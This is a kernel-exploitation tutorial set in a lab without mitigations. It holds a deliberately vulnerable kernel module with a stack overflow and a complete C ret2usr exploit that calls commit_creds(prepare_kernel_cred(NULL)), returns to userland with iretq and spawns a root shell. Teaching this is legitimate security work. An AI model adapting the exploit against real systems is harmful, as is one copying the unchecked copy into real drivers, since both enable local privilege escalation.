Linux Kernel Exploitation - ret2usr
The goal in userland exploitation is to gain code execution and trick the process into spawning a shell. In kernelland exploitation the main goal is usually to change the privileges of the current process.
The next section shows a simple vulnerability in a custom kernel module, a stack-based buffer overflow, and describes how to exploit it.
Note: No exploit mitigations such as KASLR, PTI, SMEP or SMAP are in place. Those mitigations and how to bypass them will be explained in following posts.
prerequisite
A description of how to build the debugging environment can be found here: Linux Kernel Exploitation - Environment. That environment is used in this example. During development, the init script should be modified to start a shell with root privileges.
#!/bin/sh
for i in `find /modules -name "*.ko"`
do
        insmod $i
done
mount -t proc none /proc
mount -t sysfs none /sys
mdev -s
chmod 666 /dev/stack_bof
exec /bin/sh
#setuidgid 1000 /bin/sh
Once the exploit is finished, the init script should be changed to start the shell with lower privileges.
#!/bin/sh
for i in `find /modules -name "*.ko"`
do
        insmod $i
done
mount -t proc none /proc
mount -t sysfs none /sys
mdev -s
chmod 666 /dev/stack_bof
#exec /bin/sh
setuidgid 1000 /bin/sh
vulnerability
The following excerpt shows the source code of the kernel module that is used in this blog post to demonstrate the exploitation approach:
#include <linux/compiler.h>
#include <linux/fs.h>
#include <linux/kernel.h>
#include <linux/miscdevice.h>
#include <linux/module.h>
#include <linux/uaccess.h>
MODULE_DESCRIPTION("vuln1");
MODULE_AUTHOR("sash");
MODULE_LICENSE("GPL");
#define IOCTL_VULN1_WRITE 4141
static int vuln1_open(struct inode *inode, struct file *file)
{
	return 0;
}
static int vuln1_release(struct inode *inodep, struct file *filp)
{
	return 0;
}
static noinline int vuln1_do_breakstuff(unsigned long addr)
{
	char buffer[256];
	volatile int size = 512;
	return _copy_from_user(&buffer, (void __user *)addr, size);
}
static long vuln1_ioctl(struct file *fd, unsigned int cmd, unsigned long value)
{
	long to_return;
	switch (cmd) {
		case IOCTL_VULN1_WRITE:
			to_return = vuln1_do_breakstuff(value);
			break;
		default:
			to_return = -EINVAL;
			break;
	}
	return to_return;
}
static const struct file_operations vuln1_file_ops = {
	.owner		= THIS_MODULE,
	.open		= vuln1_open,
	.unlocked_ioctl = vuln1_ioctl,
	.release	= vuln1_release,
	.llseek 	= no_llseek,
};
struct miscdevice vuln1_device = {
	.minor	= MISC_DYNAMIC_MINOR,
	.name	= "vuln",
	.fops	= &vuln1_file_ops,
	.mode	= 0666,
};
module_misc_device(vuln1_device);
The function vuln1_ioctl is called when the ioctl system call is used on the device. The module provides a single command (IOCTL_VULN1_WRITE), which internally calls vuln1_do_breakstuff. That function has a very obvious vulnerability: it copies 512 bytes from userspace into a stack buffer of 256 bytes. It calls _copy_from_user instead of copy_from_user so that the size checks built into copy_from_user do not get in the way of the buffer overflow.
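To make the missing check concrete, the following is a minimal userland sketch of a length-checked copy. It is not kernel code: memcpy stands in for the user copy, and the names checked_copy and do_not_breakstuff are hypothetical and only used for illustration.

```c
#include <errno.h>
#include <stddef.h>
#include <string.h>

#define BUFFER_SIZE 256

/*
 * Userland stand-in for the copy in vuln1_do_breakstuff().
 * memcpy() replaces the kernel's user copy; only the length
 * check is the point of this sketch.
 */
static int checked_copy(char *dst, size_t dst_size, const char *src, size_t len)
{
	if (len > dst_size)
		return -EINVAL;	/* request does not fit: refuse instead of overflowing */
	memcpy(dst, src, len);
	return 0;
}

/* Hypothetical fixed variant of the handler, modelled in userland. */
static int do_not_breakstuff(const char *src, size_t len)
{
	char buffer[BUFFER_SIZE];

	return checked_copy(buffer, sizeof(buffer), src, len);
}
```

With this check a 256-byte request is copied, while the 512-byte request used by the exploit is rejected before any byte is written past the buffer.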
Note: To compile the kernel module, the explanation here can be used. If that is not an option, all resources can be downloaded from here.
The module creates the miscellaneous device /dev/vuln, which can be opened with open() and accessed with the ioctl() syscall.
#include "stdlib.h"
#include "stdio.h"
#include "string.h"
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#define IOCTL_VULN1_WRITE 4141
void ioctl_write(int fd){
	char buffer[512];
	memset(buffer, 0x41, sizeof(buffer));
	ioctl(fd, IOCTL_VULN1_WRITE, &buffer);
}
int main(void)
{
  int fd;
  fd = open("/dev/vuln", O_RDONLY);
  if (fd < 0) {
    printf("Cannot open device file\n");
    exit(-1);
  }
  ioctl_write(fd);
  close(fd);
  return 0;
}
The device is opened in the main function. The function ioctl_write shows how to write data to the device using the ioctl syscall with the IOCTL_VULN1_WRITE command.
approach
As mentioned before, in userland exploitation the exploit usually jumps to shellcode that pops a shell. In kernelland, ret2usr is the simplest approach: it does not jump to real shellcode, but to code that calls kernelland functions to change the privileges to root and then returns to userland.
In this example the most common approach is used:
- Obtain root privileges
- Restore user context and switch to userland and to a provided function pointer
1. obtain root privileges
The common approach to obtain root privileges is to call prepare_kernel_cred and commit_creds. The following part explains what these functions do and why it makes sense to use them in the exploit.
In the kernel every task (known as a process in userland) is represented by a task_struct structure. That structure holds all information about a task, including its credentials. The credentials are stored in a struct cred, which is referenced by the pointer struct cred *cred that is part of task_struct.
struct task_struct {
#ifdef CONFIG_THREAD_INFO_IN_TASK
	/*
	 * For reasons of header soup (see current_thread_info()), this
	 * must be the first element of task_struct.
	 */
	struct thread_info		thread_info;
#endif
	/* -1 unrunnable, 0 runnable, >0 stopped: */
	volatile long			state;
	/*
	 * This begins the randomizable portion of task_struct. Only
	 * scheduling-critical items should be added above here.
	 */
	randomized_struct_fields_start
	void				*stack;
	refcount_t			usage;
	/* Per task flags (PF_*), defined further below: */
	unsigned int			flags;
	unsigned int			ptrace;
[...]
	/* Process credentials: */
	/* Tracer's credentials at attach: */
	const struct cred __rcu		*ptracer_cred;
	/* Objective and real subjective task credentials (COW): */
	const struct cred __rcu		*real_cred;
	/* Effective (overridable) subjective task credentials (COW): */
	const struct cred __rcu		*cred;
[...]
};
As the following excerpt shows, the struct cred contains all IDs like uid, gid, euid and so on.
struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char	jit_keyring;	/* default keyring to attach requested
					 * keys to */
	struct key	*session_keyring; /* keyring inherited over fork */
	struct key	*process_keyring; /* keyring private to this process */
	struct key	*thread_keyring; /* keyring private to this thread */
	struct key	*request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void		*security;	/* LSM security */
#endif
	struct user_struct *user;	/* real user ID subscription */
	struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
	struct ucounts *ucounts;
	struct group_info *group_info;	/* supplementary groups for euid/fsgid */
	/* RCU deletion */
	union {
		int non_rcu;			/* Can we skip RCU deletion? */
		struct rcu_head	rcu;		/* RCU deletion hook */
	};
} __randomize_layout;
The function prepare_kernel_cred returns a reference to a struct cred.
struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
	const struct cred *old;
	struct cred *new;
	new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
	if (!new)
		return NULL;
	kdebug("prepare_kernel_cred() alloc %p", new);
	if (daemon)
		old = get_task_cred(daemon);
	else
		old = get_cred(&init_cred);
	validate_creds(old);
	*new = *old;
	new->non_rcu = 0;
	atomic_set(&new->usage, 1);
	set_cred_subscribers(new, 0);
	get_uid(new->user);
	get_user_ns(new->user_ns);
	get_group_info(new->group_info);
#ifdef CONFIG_KEYS
	new->session_keyring = NULL;
	new->process_keyring = NULL;
	new->thread_keyring = NULL;
	new->request_key_auth = NULL;
	new->jit_keyring = KEY_REQKEY_DEFL_THREAD_KEYRING;
#endif
#ifdef CONFIG_SECURITY
	new->security = NULL;
#endif
	new->ucounts = get_ucounts(new->ucounts);
	if (!new->ucounts)
		goto error;
	if (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)
		goto error;
	put_cred(old);
	validate_creds(new);
	return new;
error:
	put_cred(new);
	put_cred(old);
	return NULL;
}
EXPORT_SYMBOL(prepare_kernel_cred);
The function expects one argument, a pointer to a struct task_struct, which may be NULL. If the argument is not NULL, the credentials (struct cred) are read from that task. If the argument is NULL, a reference to init_cred is used. init_cred is a prepared struct cred that is used for the initial task and represents root.
struct cred init_cred = {
	.usage			= ATOMIC_INIT(4),
#ifdef CONFIG_DEBUG_CREDENTIALS
	.subscribers	= ATOMIC_INIT(2),
	.magic			= CRED_MAGIC,
#endif
	.uid			= GLOBAL_ROOT_UID,
	.gid			= GLOBAL_ROOT_GID,
	.suid			= GLOBAL_ROOT_UID,
	.sgid			= GLOBAL_ROOT_GID,
	.euid			= GLOBAL_ROOT_UID,
	.egid			= GLOBAL_ROOT_GID,
	.fsuid			= GLOBAL_ROOT_UID,
	.fsgid			= GLOBAL_ROOT_GID,
	.securebits		= SECUREBITS_DEFAULT,
	.cap_inheritable	= CAP_EMPTY_SET,
	.cap_permitted		= CAP_FULL_SET,
	.cap_effective		= CAP_FULL_SET,
	.cap_bset		= CAP_FULL_SET,
	.user			= INIT_USER,
	.user_ns		= &init_user_ns,
	.group_info		= &init_groups,
	.ucounts		= &init_ucounts,
};
That means that a call to prepare_kernel_cred(NULL) returns a reference to a struct cred with root permissions. To assign those new credentials, the function commit_creds has to be used. That function expects the new credentials as its argument and assigns them to the current task.
To give the current task root privileges, it is therefore enough to perform the call commit_creds(prepare_kernel_cred(NULL));.
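The interplay of the two functions can be modelled in plain userland C. The sketch below is only an illustration under strong simplifications: cred_model, task_model, prepare_cred_model and commit_cred_model are hypothetical names, the structures are reduced to four IDs, and there is no reference counting or RCU. Unlike the real commit_creds, which always acts on the current task, the model takes the task as an explicit parameter.

```c
#include <stddef.h>
#include <stdlib.h>

/* Heavily reduced stand-ins for struct cred and struct task_struct. */
struct cred_model {
	unsigned int uid, gid, euid, egid;
};

struct task_model {
	const struct cred_model *cred;
};

/* Plays the role of init_cred: every ID is 0 (root). */
static const struct cred_model init_cred_model = { 0, 0, 0, 0 };

/* Like prepare_kernel_cred(): copy the creds of daemon, or init_cred if NULL. */
static struct cred_model *prepare_cred_model(const struct task_model *daemon)
{
	struct cred_model *new = malloc(sizeof(*new));

	if (!new)
		return NULL;
	*new = daemon ? *daemon->cred : init_cred_model;
	return new;
}

/* Like commit_creds(): install the new credentials on the given task. */
static int commit_cred_model(struct task_model *task, struct cred_model *new)
{
	if (!new)
		return -1;
	task->cred = new;
	return 0;
}
```

A task that starts with uid 1000 ends up with uid 0 after commit_cred_model(&task, prepare_cred_model(NULL)), which mirrors the effect of the kernel call used in the exploit.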
2. restore user context and switch to userland
The last step of the exploit is to jump to a function located in userland. If the exploit jumped to the userland function immediately after obtaining root privileges, important registers such as RSP, RFLAGS and the segment registers CS and SS would still hold kernelland values. Those segments, and the kernel stack, are not accessible from userland, so the exploit has to restore the user context manually. To make that possible, the user context (all necessary registers) has to be saved before switching to kernelland, that is, before the ioctl call.
unsigned long u_cs;
unsigned long u_ss;
unsigned long u_rsp;
unsigned long u_rflags;
unsigned long u_rip;
void save_state() {
    __asm__(
        ".intel_syntax noprefix;"
        "mov u_cs, cs;"
        "mov u_ss, ss;"
        "mov u_rsp, rsp;"
        "pushf;"
        "pop u_rflags;"
        ".att_syntax;"
        );
    u_rip = (unsigned long)&start_sh;
}
The current RIP is not saved. Instead, u_rip is set to the address of a function that does everything that should run with the elevated privileges after the privilege escalation. In this example that function starts a shell.
void start_sh() {
    char *args[] = {"/bin/sh", "-i", NULL};
    execve("/bin/sh", args, NULL);
}
The GS register does not need to be saved, because it can be restored with the swapgs instruction. swapgs is a privileged instruction that swaps the GS base between its kernelland and userland values.
Since all necessary values are saved, they can be restored after the call to commit_creds.
void restore_state() {
        __asm__(
            ".intel_syntax noprefix;"
            "swapgs;"                 // restore the userland gs base
            "push u_ss;"              // then push all other values
            "push u_rsp;"             // to the stack for iretq
            "push u_rflags;"
            "push u_cs;"
            "push u_rip;"             // points to start_sh 
            "iretq;"                     
            ".att_syntax;"
            );
}
All saved values are pushed onto the stack because the iretq instruction restores them from there automatically. iretq is the interrupt-return instruction: it pops RIP, CS, RFLAGS, RSP and SS from the stack and can thereby drop from kernel mode back to user mode, much like ret returns from a function call. Executing iretq therefore leaves the kernel and switches back to userland. Since the saved u_rip points to start_sh, that function is executed after the return.
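Because the stack grows downwards, the values are pushed in reverse order (SS first, RIP last), so that RIP ends up at the lowest address where iretq expects it. The resulting memory layout can be written down as a struct. This is only an illustrative sketch; iret_frame and build_iret_frame are hypothetical names that do not appear in the exploit.

```c
#include <stdint.h>

/* Order in which iretq pops its operands, lowest address first. */
struct iret_frame {
	uint64_t rip;
	uint64_t cs;
	uint64_t rflags;
	uint64_t rsp;
	uint64_t ss;
};

/* Fill a frame from saved user state (the u_* values of save_state()). */
static void build_iret_frame(struct iret_frame *f, uint64_t rip, uint64_t cs,
			     uint64_t rflags, uint64_t rsp, uint64_t ss)
{
	f->rip = rip;
	f->cs = cs;
	f->rflags = rflags;
	f->rsp = rsp;
	f->ss = ss;
}
```

The same five-quadword layout is what restore_state builds with its five push instructions.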
exploit
Now put everything together for a working exploit.
- Find the addresses of commit_creds and prepare_kernel_cred
- Save user state
- Overflow the buffer and overwrite the return address with the address of a function that does the following:
  - Call commit_creds(prepare_kernel_cred(NULL))
  - Restore user state and call iretq
All necessary functions are shown above. What is still missing are the addresses of the commit_creds and prepare_kernel_cred functions, and the offset from the beginning of the buffer to the return address.
The addresses of the functions can be found in several ways:
- Looking for the addresses in /proc/kallsyms
- Printing the addresses in gdb
Reading the kernel symbol addresses from /proc/kallsyms requires root permissions, which is why the init script starts a root shell during development.
# cat /proc/kallsyms | grep prepare_kernel_cred
ffffffff810d2950 T prepare_kernel_cred
# cat /proc/kallsyms | grep commit_creds
ffffffff810d26f0 T commit_creds
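The lookup can also be done programmatically. The following is a minimal sketch, assuming the "address type name" line layout shown in the output above; find_symbol is a hypothetical helper and not part of the exploit. It matches the symbol name exactly, whereas grep also matches substrings.

```c
#include <stdio.h>
#include <string.h>

/*
 * Scan "address type name" lines (the /proc/kallsyms layout shown above)
 * and return the address of the first exact match, or 0 if none is found.
 */
static unsigned long find_symbol(FILE *fp, const char *wanted)
{
	char line[512];
	unsigned long addr;
	char type;
	char name[256];

	while (fgets(line, sizeof(line), fp)) {
		/* skip lines that do not have all three fields */
		if (sscanf(line, "%lx %c %255s", &addr, &type, name) != 3)
			continue;
		if (strcmp(name, wanted) == 0)
			return addr;
	}
	return 0;
}
```

Called with a stream opened on /proc/kallsyms from the root shell and the name commit_creds, it should return the same address as the grep command. Without root permissions a result of 0 is to be expected.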
The offset can easily be read from the disassembly of the function:
			;-- vuln1_do_breakstuff:
            ; CALL XREF from sub.vuln1_ioctl_80000f0 @ 0x8000104(x)
┌ 50: sub.vuln1_do_breakstuff_80000b0 ();
│           ; var int64_t var_100h @ rbp-0x100
│           ; var int64_t var_104h @ rbp-0x104
│           0x080000b0      e800000000     call __fentry__             ; RELOC 32 __fentry__
│           ; CALL XREF from sub.vuln1_do_breakstuff_80000b0 @ 0x80000b0(x)
│           0x080000b5      55             push rbp
│           0x080000b6      4889fe         mov rsi, rdi
│           0x080000b9      4889e5         mov rbp, rsp
│           0x080000bc      4881ec0801..   sub rsp, 0x108
│           0x080000c3      c785fcfeff..   mov dword [var_104h], 0x200 ; 512
│           0x080000cd      486395fcfe..   movsxd rdx, dword [var_104h]
│           0x080000d4      488dbd00ff..   lea rdi, [var_100h]
│           0x080000db      e800000000     call _copy_from_user        ; RELOC 32 _copy_from_user
│           ; CALL XREF from sub.vuln1_do_breakstuff_80000b0 @ 0x80000db(x)
│           0x080000e0      c9             leave
└           0x080000e1      c3             ret
At address 0x080000d4 the address of the buffer is loaded into RDI as the first argument of _copy_from_user. The buffer is therefore located at RBP-0x100, so the offset from the beginning of the buffer to RBP is 0x100. RBP points to the saved frame pointer, and the value right after the saved frame pointer is the return address. The offset from the beginning of the buffer to the return address is therefore 0x100 + 8 = 0x108.
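The offset arithmetic and the resulting payload layout can be sketched as follows. The helper names ret_offset and build_payload are hypothetical, and the sketch assumes x86-64 Linux, where the saved frame pointer is 8 bytes wide.

```c
#include <stddef.h>
#include <string.h>

#define BUF_TO_RBP 0x100	/* buffer starts at rbp-0x100 */

/* Distance from the start of the buffer to the saved return address. */
static size_t ret_offset(void)
{
	return BUF_TO_RBP + sizeof(unsigned long);	/* skip the saved rbp */
}

/* Fill payload with padding and place target where the return address lives. */
static int build_payload(unsigned char *payload, size_t len, unsigned long target)
{
	size_t off = ret_offset();

	if (len < off + sizeof(target))
		return -1;	/* payload too short to reach the return address */
	memset(payload, 0x41, len);
	memcpy(payload + off, &target, sizeof(target));
	return 0;
}
```

Everything before offset 0x108 is padding, and the 8 bytes at 0x108 replace the return address of vuln1_do_breakstuff.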
The following excerpt shows the exploit:
#include "stdlib.h"
#include "stdio.h"
#include "string.h"
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#define IOCTL_VULN1_WRITE 4141
#define COMMIT_CREDS_ADDRESS 0xffffffff810d26f0ul
#define PREPARE_KERNEL_CRED_ADDRESS 0xffffffff810d2950ul
typedef int (* t_commit_creds)(void *);
typedef void *(* t_prepare_kernel_cred)(void *);
t_commit_creds commit_creds = (t_commit_creds)COMMIT_CREDS_ADDRESS;
t_prepare_kernel_cred prepare_kernel_cred = (t_prepare_kernel_cred)PREPARE_KERNEL_CRED_ADDRESS;
unsigned long u_cs;
unsigned long u_ss;
unsigned long u_rsp;
unsigned long u_rflags;
unsigned long u_rip;
void start_sh() {
    char *args[] = {"/bin/sh", "-i", NULL};
    execve("/bin/sh", args, NULL);
}
void save_state() {
    __asm__(
        ".intel_syntax noprefix;"
        "mov u_cs, cs;"
        "mov u_ss, ss;"
        "mov u_rsp, rsp;"
        "pushf;"
        "pop u_rflags;"
        ".att_syntax;"
        );
    u_rip = (unsigned long)&start_sh;
}
void restore_state() {
        __asm__(
            ".intel_syntax noprefix;"
            "swapgs;"                 // restore the userland gs base
            "push u_ss;"              // then push all other values
            "push u_rsp;"             // to the stack for iretq
            "push u_rflags;"
            "push u_cs;"
            "push u_rip;"             // points to start_sh
            "iretq;"
            ".att_syntax;"
            );
}
void exploit(){
  commit_creds(prepare_kernel_cred(NULL));
  restore_state();
}
void ioctl_write(int fd){
  char buffer[512];
  memset(buffer, 0x41, sizeof(buffer));
  // overwrite return address
  *(unsigned long *)&buffer[0x108] = (unsigned long) &exploit;
  //save user state
  save_state();
  
  // ioctl syscall
  ioctl(fd, IOCTL_VULN1_WRITE, &buffer);
}
int main(void)
{
  int fd;
  // open the device (the module registers it under the name "vuln")
  fd = open("/dev/vuln", O_RDONLY);
  if (fd < 0) {
    printf("Cannot open device file\n");
    exit(-1);
  }
  ioctl_write(fd);
  close(fd);
  return 0;
}
The exploit needs to be statically compiled with gcc -static vuln1_exploit.c -o vuln1_exploit and then put into the initramfs file.
Furthermore, chmod 666 /dev/vuln should be added to the init script in order to ensure that the device can be accessed by a normal user.
All materials can be found on https://github.com/sashs/linux_kernel_exploitation.
resources
- ioctl - https://docs.kernel.org/driver-api/ioctl.html
- Writing misc device drivers - https://embetronicx.com/tutorials/linux/device-drivers/misc-device-driver/
- module_misc_device - https://elixir.bootlin.com/linux/v5.13.19/source/include/linux/miscdevice.h#L105
- task_struct - https://elixir.bootlin.com/linux/v5.13.19/source/include/linux/sched.h#L657
- commit_creds - https://elixir.bootlin.com/linux/v5.13.19/source/kernel/cred.c#L449
- struct cred - https://elixir.bootlin.com/linux/v5.13.19/source/include/linux/cred.h#L110
- prepare_kernel_cred - https://elixir.bootlin.com/linux/v5.13.19/source/kernel/cred.c#L719
- init_cred - https://elixir.bootlin.com/linux/v5.13.19/source/kernel/cred.c#L41
- swapgs - https://www.kernel.org/doc/Documentation/x86/entry_64.txt
